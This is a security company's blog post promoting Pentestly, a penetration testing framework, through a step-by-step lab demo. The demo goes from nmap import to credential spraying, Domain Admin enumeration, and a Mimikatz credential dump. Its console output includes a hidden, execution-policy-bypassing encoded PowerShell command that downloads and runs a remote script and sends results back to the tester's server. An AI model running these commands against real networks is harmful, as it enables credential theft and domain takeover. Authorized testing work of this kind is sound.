Pentestly on GitHub

Python appears to be an ever growing trend in the security community. Being able to connect Python tools together has proven beneficial for us. Powershell has also seen increasingly more use due to its wide availability in internal environments. Pentestly utilizes the power of these tools together in a familiar user experience.


Pentestly stands on the shoulders of giants. Below are the current tools utilized in Pentestly:

  • recon-ng - Backend database for recon-ng is beautifully made and leveraged in Pentestly for data manipulation
  • wmiexec.py - Allows us to execute Powershell commands quickly and easily via WMI
  • smbmap.py - Useful utility for enumerating SMB shares
  • Invoke-Mimikatz.ps1 - Implementation of Mimikatz in Powershell

Below is a proof of concept demonstration of using Pentestly to auto detect Domain Admin from Domain User credentials (from Gladius) using Invoke-Mimikatz.

Demo - one step at a time


Let's walk through the demonstration one step at a time.


Import XML

As with any engagement, XML nmap results from our environment are imported into Pentestly:

[pentestly][demo] > load nmap
[pentestly][demo][nmap_xml] > set FILENAME /home/cduplantis/engagement/port-445.xml
FILENAME => /home/cduplantis/engagement/port-445.xml
[pentestly][demo][nmap_xml] > run
[*] 3 new records added.

-------
SUMMARY
-------
[*] 3 total (3 new) ports found.
[pentestly][demo][nmap_xml] > show ports
  +------------------------------------------------------------+
  | rowid |   ip_address   | host | port | protocol |  module  |
  +------------------------------------------------------------+
  | 1     | 10.202.208.4   |      | 445  | tcp      | nmap_xml |
  | 2     | 10.202.208.111 |      | 445  | tcp      | nmap_xml |
  | 3     | 10.202.208.112 |      | 445  | tcp      | nmap_xml |
  +------------------------------------------------------------+


Credentials, credentials, credentials

We begin by attempting to authenticate with the following credentials received from Gladius:

zojix \ nsportsman : password1!
[pentestly][demo] > load login
[pentestly][demo][login] > set username nsportsman
[pentestly][demo][login] > set password password1!
[pentestly][demo][login] > set domain zojix
[pentestly][demo][login] > run
[*] Success - nsportsman:password1!@10.202.208.4
[*] Fail - nsportsman:password1!@10.202.208.111
[*] Success - nsportsman:password1!@10.202.208.112
[*] Testing execution access of credentials
[*] Execution: zojix\nsportsman:password1!@10.202.208.4 - echo
[*] Failed to execute: zojix\nsportsman:password1!@10.202.208.4
[*] Execution: zojix\nsportsman:password1!@10.202.208.112 - echo
[*] Successful execution: zojix\nsportsman:password1!@10.202.208.112

w00t! The key take away here is the following line:

[*] Successful execution: zojix\nsportsman:password1!@10.202.208.112

This tells us that we do have execution rights on 10.202.208.112.


WhoDunIt? Domain Admins

One useful cross-reference point is to grab the Domain and Enterprise admin list so that if we come across that user's credentials in the domain, Pentestly will know that we have Domain Admin credentials.

[pentestly][demo] > load get_dom # fuzzy searching for get_domain_admin_names
[pentestly][demo][get_domain_admin_names] > run
[*] Execution: zojix\nsportsman:password1!@10.202.208.112 - net groups "Domain Admins" /domain
[*] Found Domain Admin: zojix\Administrator
[*] Found Domain Admin: zojix\TheRealDA
[*] Execution: zojix\nsportsman:password1!@10.202.208.112 - net groups "Enterprise Admins" /domain
[*] Found Enterprise Admin: zojix\Administrator
[*] Found Enterprise Admin: zojix\TheRealDA


Mimikatz all the things

For the grand finale, let's mimikatz the machines that we have execution access.

[pentestly][demo] > load mimi # Again, fuzzy searching for mimikatz
[pentestly][demo][mimikatz] > run
[*] Execution: zojix\nsportsman:password1!@10.202.208.112 - powershell -window hidden -exec bypass -NonInteractive -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBE…
...snip long command…
[*] Waiting for Powershell results
10.202.208.112 - - [04/Feb/2016 07:56:46] "GET /about.html HTTP/1.1" 200 -
10.202.208.112 - - [04/Feb/2016 07:56:50] "POST / HTTP/1.1" 200 -
Starting web server

After parsing the Mimikatz output, Pentestly attempts to cross reference the user list with the Domain Admin list and immediately recognizes a Domain Admin in the Mimikatz output. Here, Mimikatz recognized a Domain Admin logging into a user workstation machine. Silly, DA.

[*] Success! TheRealDA:<leetpassword>tryGUESSINGthisdrowssaP</leetpassword>  - DOMAIN ADMIN!
You have one DA, do you want to continue to find more? [yN]
>


Start playing with Pentestly today:


Pentestly on GitHub


Or, get started with Pentestly now:

git clone http://github.com/praetorian-inc/pentestly

 





Your World, Secured.


Tech Puzzles

Try our Puzzles

Test your problem solving skills. Do you have what it takes?

Try puzzles ยป